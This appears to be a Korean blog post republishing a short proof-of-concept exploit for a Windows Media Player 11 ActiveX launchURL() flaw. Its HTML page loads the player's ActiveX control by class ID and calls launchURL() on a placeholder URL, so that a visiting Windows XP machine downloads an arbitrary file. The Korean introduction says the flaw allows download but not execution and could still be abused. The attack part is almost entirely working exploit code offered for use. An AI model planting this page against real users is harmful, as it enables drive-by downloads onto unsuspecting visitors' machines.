Windows Media Player 11 ActiveX launchURL() files download

윈도우 미디어 플레이어 11 버젼에 대한 ActiveX 취약점 입니다.
다운로드 취약점이라 실행까지는 되지 않지만 충분히 악용될 가능성이 있는 취약점으로 보이네요..

<!-------
This is a vulnerability into Windows Media Player ActiveX launchURL() function
which someone can download what ever file into the vulnerable machine !!!
Discovered and written by Jacky!

Tested version: 11.0.5358.4827
Tested machine: Windows XP SP3 & Windows XP SP2
--------->
<html>
<body>
<object id='test' classid='clsid:{6BF52A52-394A-11d3-B153-00C04F79FAA6}'></object>
<script>
arg1='http://<BLAH BLAH BLAH FILE>';
test.launchURL(arg1);
</script>
</body>
</html>

답글 남기기

이메일 주소는 공개되지 않습니다. 필수 필드는 *로 표시됩니다